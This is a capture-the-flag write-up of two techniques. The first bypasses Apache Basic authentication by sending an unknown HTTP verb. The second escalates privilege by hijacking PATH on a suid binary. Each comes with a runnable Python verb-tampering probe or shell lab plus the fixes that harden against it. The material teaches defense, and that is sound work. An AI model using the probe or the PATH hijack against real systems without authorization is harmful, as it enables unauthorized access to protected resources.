HTTP Verb Tampering

Here I have a static web page. I viewed the source and there aren't any comments, JavaScript, forms, or other exploitable features on the page.

I ran Dirbuster to discover additional unlinked content and found the directory /admin.

The Burp Suite Pro proxy history shows that the page is using Basic authentication.

I attempted to brute force the login but the password wasn't found. I then used Nmap to test for HTTP verb tampering.

Next I went back to Burp Suite, intercepted the request, changed the GET verb to GGG, and was able to bypass authentication and retrieve the challenge password.

GET is only one of many HTTP verbs: GET, POST, PUT, DELETE, OPTIONS, TRACE, CONNECT, the WebDAV methods PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK and UNLOCK, and non-standard ones such as DEBUG and SPACEJUMP that are not part of the HTTP/1.1 specification at all.
Here is a sample .htaccess file in which the author limited only the GET and POST verbs, which I was able to easily bypass:
AuthName "restrict access"
AuthType Basic
AuthUserFile /usr/local/etc/httpd/users
<Limit GET POST>
require group staff
</Limit>

You could also list every HTTP verb you know of in the Limit directive:
AuthName "restrict all methods"
AuthType Basic
AuthUserFile /usr/local/etc/httpd/users
<Limit POST GET PUT DELETE SPACEJUMP DEBUG OPTIONS TRACE CONNECT PROPFIND LOCK UNLOCK PROPPATCH MKCOL COPY MOVE>
require group staff
</Limit>

However, as you saw above, I was able to use Burp to tamper with the request: the server treated the unknown "GGG" as a GET request, it matched nothing in the Limit list, so the authentication requirement never applied and I bypassed it. A list of verbs can never be complete, because the server may accept a verb you did not think of.
The safe alternative is to remove the Limit block entirely, so that the Require directive applies to every method, known or unknown, and catches anything you throw at it. Apache's own documentation says the same: access-control directives normally belong outside <Limit>, and if you must enumerate methods, <LimitExcept> (which names the methods to leave open and restricts all others) is the safer direction.
AuthName "restrict all methods"
AuthType Basic
AuthUserFile /usr/local/etc/httpd/users
require group staff
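As an added example (not code from the original write-up), the following script is the check I would run against a protected path: it sends a list of verbs, including a made-up one like the "GGG" above, without credentials and reports which ones are served while a plain GET gets a 401. So that it runs offline, it also includes a constructed stand-in server, WeakLimitHandler, that imitates the weak <Limit GET POST> configuration: only GET and POST are challenged and every other verb falls through to the resource handler. The URL, port, realm and flag value are all made up for the demo; point probe() at a real URL to test a live target.

```python
"""Verb-tampering probe plus a constructed stand-in for a server that only
challenges the methods named in <Limit GET POST>.  Added example; not code
from the original write-up.  The local server exists so the probe can be
run offline; probe() works against any URL."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

# Standard verbs plus one made-up token, like the write-up's "GGG".
METHODS = ["GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "TRACE", "GGG"]


def probe(url, methods=METHODS, timeout=5):
    """Send each method to url with no credentials; return {method: status}."""
    u = urlparse(url)
    results = {}
    for method in methods:
        conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
        try:
            conn.request(method, u.path or "/")
            resp = conn.getresponse()
            resp.read()  # drain the body so the connection closes cleanly
            results[method] = resp.status
        finally:
            conn.close()
    return results


def bypasses(results):
    """Methods answered 2xx although a plain GET was challenged with 401."""
    if results.get("GET") != 401:
        return []  # GET itself is not protected, so there is nothing to bypass
    return sorted(m for m, s in results.items() if 200 <= s < 300)


class WeakLimitHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the weak .htaccess: Basic auth is demanded
    only for the verbs in LIMITED; any other verb, known or not, reaches the
    same resource handler, which is the behaviour the write-up exploited."""
    LIMITED = {"GET", "POST"}
    SECRET = b"flag{constructed-example}\n"  # made-up "challenge password"

    def __getattr__(self, name):
        # BaseHTTPRequestHandler dispatches to do_<VERB> and answers 501 when
        # that attribute is missing; route every verb, GGG included, to _serve.
        if name.startswith("do_"):
            return self._serve
        raise AttributeError(name)

    def _serve(self):
        if self.command in self.LIMITED and "Authorization" not in self.headers:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="restrict access"')
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(self.SECRET)))
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(self.SECRET)

    def log_message(self, *args):
        pass  # keep the demo quiet


def start_weak_server():
    """Start the stand-in on a free loopback port; return (server, url)."""
    srv = HTTPServer(("127.0.0.1", 0), WeakLimitHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d/admin/" % srv.server_address[1]


if __name__ == "__main__":
    srv, url = start_weak_server()
    try:
        r = probe(url)
        for m in METHODS:
            print("%-8s %s" % (m, r[m]))
        print("bypasses:", bypasses(r))
    finally:
        srv.shutdown()
```

Against the stand-in, GET and POST come back 401 and everything else, HEAD and GGG included, comes back 200 with the flag; against the hardened configuration (Require outside any Limit block) bypasses() returns an empty list because every verb is challenged.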

Exploiting suid binary on Root-me.org ELF32 – System 1

Once logged in, I issued "ls -l" and found the binary "ch11" as well as its source code file. Notice that ch11 is suid root and that our user account doesn't have permission to view the contents of the .passwd file, which contains the flag. Even without the source code, the "strings" command gives enough of a clue to solve this challenge without a debugger: notice the string "ls /challenge/app-script/ch11/.passwd", where .passwd is the file holding the flag. The command is ls by bare name, not by absolute path.

I executed the ch11 binary:

Since the binary is suid, whatever command it executes runs with the file owner's privileges (root) instead of ours, and because ls is invoked by bare name, the shell resolves it through our PATH.

So I copied /bin/cat to /tmp/ls, exported a PATH with /tmp searched first, and ran ch11 again. This time the "ls" it executes is really /tmp/ls, i.e. cat, and it prints the flag from the ".passwd" file!
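As an added example (not the challenge's own code), this script reproduces the PATH hijack in a scratch directory so the mechanism can be seen without a suid binary. The "ch11" here is a constructed stand-in, a two-line script that runs a bare "ls <file>" just as the strings output above shows the real binary doing; the planted "ls" is a wrapper that execs cat rather than a copy of /bin/cat, which behaves the same and also works where cat is a busybox applet. A hardened stand-in that resets PATH before calling ls is included for contrast. Nothing runs as root here, so the flag file is world-readable; on the real box the suid bit is what turns the substituted command into root's cat.

```sh
#!/bin/sh
# Added example, not the challenge's code: PATH hijack against a constructed
# stand-in for ch11.  No suid involved; only the name resolution is shown.
set -e

# Build the lab: a "protected" file and a ch11 stand-in that runs "ls <file>"
# by bare name, exactly the call the strings output revealed.
setup_lab() {
    lab=$(mktemp -d)
    mkdir -p "$lab/app" "$lab/hijack"
    printf 'flag{constructed-example}\n' > "$lab/app/.passwd"
    cat > "$lab/app/ch11" <<EOF
#!/bin/sh
ls $lab/app/.passwd
EOF
    chmod +x "$lab/app/ch11"
    echo "$lab"
}

# Plant a program called "ls" that actually behaves like cat.
plant_fake_ls() {
    printf '#!/bin/sh\nexec cat "$@"\n' > "$1/hijack/ls"
    chmod +x "$1/hijack/ls"
}

# Untampered run: ls is found on the normal PATH and only prints the file name.
run_normal() {
    "$1/app/ch11"
}

# The write-up's attack: fake ls first in PATH, run the victim again.
# The victim now cat's the file it meant to ls.
run_hijack() {
    plant_fake_ls "$1"
    PATH="$1/hijack:$PATH" "$1/app/ch11"
}

# Hardened counterpart: the victim resets PATH to trusted directories (calling
# /bin/ls by absolute path would do equally well), so the planted ls is ignored.
run_hijack_against_fixed() {
    cat > "$1/app/ch11_fixed" <<EOF
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
ls $1/app/.passwd
EOF
    chmod +x "$1/app/ch11_fixed"
    plant_fake_ls "$1"
    PATH="$1/hijack:$PATH" "$1/app/ch11_fixed"
}

lab=$(setup_lab)
echo "normal:   $(run_normal "$lab")"
echo "hijacked: $(run_hijack "$lab")"
echo "fixed:    $(run_hijack_against_fixed "$lab")"
rm -rf "$lab"
```

The normal run prints only the path of .passwd, the hijacked run prints the flag, and the fixed stand-in prints the path again despite the same planted ls. Real suid programs should in addition avoid system()-style calls altogether, or set a known PATH and use absolute paths, since the environment they inherit belongs to the untrusted caller.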